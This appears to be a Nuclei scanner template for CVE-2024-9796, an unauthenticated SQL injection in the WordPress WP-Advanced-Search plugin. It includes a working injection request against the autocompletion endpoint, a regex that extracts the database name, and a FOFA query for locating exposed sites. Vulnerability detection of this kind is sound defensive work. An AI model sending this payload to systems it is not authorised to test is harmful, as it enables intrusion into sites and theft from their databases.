id: CVE-2024-9796 info: name: WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection author: s4e-io severity: critical description: | The WordPress WP-Advanced-Search plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. impact: | Unauthenticated attackers can exploit SQL injection through the autocompletion endpoint to extract sensitive database information including user credentials, posts, comments, and configuration data. remediation: | Update WP-Advanced-Search plugin to a version later than 3.3.9 that properly escapes user supplied parameters and uses prepared SQL statements in autocompletion-PHP5.5.php. reference: - https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/ - https://github.com/RandomRobbieBF/CVE-2024-9796 - https://nvd.nist.gov/vuln/detail/CVE-2024-9796 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-9796 cwe-id: CWE-89 epss-score: 0.02991 epss-percentile: 0.8567 metadata: max-request: 1 verified: true vendor: mathieu_chartier product: wp-advanced-search framework: wordpress fofa-query: body="/wp-content/plugins/wp-advanced-search/" tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-advanced-search,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e" matchers-condition: and matchers: - type: regex part: body regex: - "Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist" - type: status status: - 200 extractors: - type: regex part: body name: database_name regex: - "([a-zA-Z0-9_]+)\\.wp_users" # digest: 4a0a0047304502202c27d75c05b4fdea48c2517f547c39d8190baf1dc8630d6aca94fecb24a8d053022100fc3f178748d82121fd1ab83f4783f357029d21996fd502a3779b3a9f7ff866ea:922c64590222798bb761d5b6d8e72950